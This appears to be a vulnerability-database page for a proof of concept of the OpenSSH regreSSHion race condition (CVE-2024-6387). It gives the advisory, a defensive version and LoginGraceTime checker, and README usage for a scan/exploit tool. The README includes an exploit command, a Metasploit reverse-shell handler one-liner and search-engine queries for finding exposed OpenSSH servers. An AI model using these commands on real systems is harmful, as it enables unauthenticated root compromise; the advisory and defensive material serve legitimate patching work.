CVE-2024-6387 PoC — Openssh: regresshion - race condition in ssh allows rce/dos

**Associated Vulnerability**

Title: Openssh: regresshion - race condition in ssh allows rce/dos (CVE-2024-6387)

Description: A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.

**PoC Description**

Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387)

**Readme**
## Description
Remote Unauthenticated Code Execution Vulnerability in OpenSSH server

CVE-2024-6387.py is a lightweight, efficient tool designed to identify servers running vulnerable versions of OpenSSH, specifically targeting the recently discovered `regreSSHion` vulnerability (CVE-2024-6387). This script facilitates rapid scanning of multiple IP addresses, domain names, and CIDR network ranges to detect potential vulnerabilities and ensure your infrastructure is secure.

A signal handler race condition was found in OpenSSH's server (sshd): if a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example syslog().
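The paragraph above describes the two facts a defender can act on without touching the exploit: the server's OpenSSH version (visible in its identification banner) and the LoginGraceTime setting whose SIGALRM timeout the race depends on. The following is an added example, not code from this PoC repository or from the scanner it builds on. It extracts the OpenSSH version from a banner string, reads an `sshd_config` text to find the effective `LoginGraceTime`, and combines both into a triage verdict for a host you administer. Assumptions: the fix threshold `FIXED_IN = (9, 8)` comes from the OpenSSH 9.8 release notes linked on this page and is a coarse "older than the fix" signal rather than the exact affected range (that range is in the Qualys advisory linked on the page); the sample banner and config are constructed inputs; the function and constant names are this example's own.

```python
"""Defender-side exposure checks for CVE-2024-6387 (regreSSHion).

Added example: this is not code from the PoC repository. It implements
two checks the README describes only in prose: extracting the OpenSSH
version from an SSH identification banner, and reading sshd_config to
see whether the LoginGraceTime mitigation is in place (LoginGraceTime 0
disables the timeout whose SIGALRM handler the race depends on).
"""
import re

# RFC 4253 identification string: "SSH-protoversion-softwareversion SP comments".
# OpenSSH software versions look like "OpenSSH_9.6p1"; "pN" is the portable release.
BANNER_RE = re.compile(r"^SSH-2\.0-OpenSSH_(\d+)\.(\d+)(?:p(\d+))?")

# Assumption: the page links the OpenSSH 9.8 release notes as the fix, so anything
# older is flagged for review. This is a coarse triage threshold, not the exact
# affected range (see the Qualys advisory linked on the page). Distro backports such
# as the Ubuntu USN linked on the page patch without changing the version string, so
# a banner-only check produces false positives on patched hosts.
FIXED_IN = (9, 8)

SSHD_DEFAULT_LOGIN_GRACE = 120  # sshd default, as the README states

_TIME_UNITS = {"s": 1, "m": 60, "h": 3600, "d": 86400, "w": 604800}


def parse_openssh_version(banner):
    """Return (major, minor, portable) for an OpenSSH banner, or None for other software."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        return None
    major, minor, portable = m.groups()
    return (int(major), int(minor), int(portable) if portable else 0)


def version_predates_fix(banner):
    """True if the banner is OpenSSH older than FIXED_IN, False if not, None if not OpenSSH."""
    v = parse_openssh_version(banner)
    if v is None:
        return None
    return v[:2] < FIXED_IN


def parse_sshd_time(value):
    """Parse an sshd_config time value: plain seconds or a run of <n><s|m|h|d|w> terms."""
    value = value.strip().lower()
    if value.isdigit():
        return int(value)
    if not re.fullmatch(r"(?:\d+[smhdw])+", value):
        raise ValueError("bad sshd time value: %r" % value)
    return sum(int(n) * _TIME_UNITS[u] for n, u in re.findall(r"(\d+)([smhdw])", value))


def login_grace_time(sshd_config_text):
    """Effective LoginGraceTime from sshd_config text.

    Keywords are case-insensitive and, as in sshd, the first occurrence wins.
    Include directives are not followed; pass the merged text if you use them.
    """
    for raw in sshd_config_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0].lower() == "logingracetime":
            return parse_sshd_time(parts[1])
    return SSHD_DEFAULT_LOGIN_GRACE


def assess(banner, sshd_config_text):
    """Combine both checks into one triage verdict for a host you administer."""
    predates = version_predates_fix(banner)
    grace = login_grace_time(sshd_config_text)
    mitigated = grace == 0
    if predates is None:
        verdict = "not-openssh"
    elif not predates:
        verdict = "fixed-release"
    elif mitigated:
        verdict = "mitigated-by-config"
    else:
        verdict = "review"
    return {"version": parse_openssh_version(banner), "login_grace_time": grace,
            "mitigated": mitigated, "verdict": verdict}


if __name__ == "__main__":
    # Constructed sample inputs, not captured from a real host.
    sample_banner = "SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13"
    sample_config = "Port 22\n# LoginGraceTime 2m\nLoginGraceTime 0\nPermitRootLogin no\n"
    print(assess(sample_banner, sample_config))
```

Two things to keep in mind when reading the verdicts: `review` means "old version string and no config mitigation", which on a distro-patched host is a false positive that only the package changelog (or the linked USN) can resolve; and `LoginGraceTime 0` removes the timeout entirely, so unauthenticated connections are never reaped and the server becomes easier to exhaust through `MaxStartups`, which is why upgrading to the fixed release is the preferred remediation and the config change is a stopgap.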

## Details
You can find the technical details [here](https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt).

The flaw, discovered by researchers at Qualys in `May 2024`, and assigned the identifier CVE-2024-6387, is due to a signal handler race condition in sshd that allows unauthenticated remote attackers to execute arbitrary code as root.

> "If a client does not authenticate within LoginGraceTime seconds (120 by default), then sshd's SIGALRM handler is called asynchronously and calls various functions that are not async-signal-safe."

> "A remote unauthenticated attacker can take advantage of this flaw to execute arbitrary code with root privileges."

## ⚙️ Usage
### Scanning OpenSSH Server
> Requirement: python3 latest

### Command Line Arguments
- `mode`: Selects the operation mode. Choices are `scan` or `exploit`.
- `-T, --targets`: IP addresses, domain names, file paths containing IP addresses, or CIDR network ranges.
- `-f, --outputfile`: File to save results to (e.g., `result.json`).
- `-g, --gracetimecheck`: Time in seconds to wait after identifying the version to check for LoginGraceTime mitigation (default: 120 seconds).
- `-n, --nic`: Network NIC (default: `eth0`).
- `-o, --output`: Output format for results (choices: `csv`, `txt`, `json`).
- `-p, --port`: Port number to check or exploit (default: 22).
- `-s, --speed`: Number of threads to increase race condition chances (default: 10).
- `-t, --timeout`: Connection timeout in seconds (default: 1 second).
- `-H, --resolve-hostnames`: Resolve hostnames.

### Examples

#### Scanning a single URL/IP

```bash
python3 CVE-2024-6387.py scan -T example.com -p 22
```

#### Running the exploit against one domain / IP

```bash
python3 CVE-2024-6387.py exploit -T example.com -p 22 -n eth0
```

# Escalation Process

### Catching payload
Run the command below first (replace `{yourip}` with the handler's address), then run the exploit with the command above.
```bash
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST {yourip}; set LPORT 9999; exploit -j"
```

## Output
The tool provides color-coded output to the console for better readability:

- **Green**: Successful connection or operation.
- **Red**: Failed connection or error.
- **Yellow**: Warnings or noteworthy information.
- **Cyan**: General information or status updates.

## Host Discovery
- **Hunter**: `/product.name="OpenSSH"`
- **FOFA**: `app="OpenSSH"`
- **SHODAN**: `product:"OpenSSH"`
- **CENSYS**: `(openssh) and labels=remote-access`

## References
- **Original scanner**: [CVE-2024-6387 Scanner](https://github.com/xaitax/CVE-2024-6387_Check)
- **Original PoC**: [CVE-2024-6387 PoC](https://github.com/zgzhang/cve-2024-6387-poc)

## Further References
- http://www.openwall.com/lists/oss-security/2024/07/01/12
- https://bugzilla.redhat.com/show_bug.cgi?id=2294604
- https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt
- https://ubuntu.com/security/CVE-2024-6387
- https://ubuntu.com/security/notices/USN-6859-1
- https://explore.alas.aws.amazon.com/CVE-2024-6387.html
- https://archlinux.org/news/the-sshd-service-needs-to-be-restarted-after-upgrading-to-openssh-98p1/
- https://www.openssh.com/txt/release-9.8
- https://lists.mindrot.org/pipermail/openssh-unix-announce/2024-July/000158.html
- https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server
- http://www.openwall.com/lists/oss-security/2024/07/01/13
**File Snapshot**

```
[4.0K] /data/pocs/ce0d34ab04d93f4e334f00fb9a896f1ca87fb58f
├── [ 15K] 7etsuo-regreSSHion.c
├── [ 18K] CVE-2024-6387.py
└── [4.2K] README.md

0 directories, 3 files
```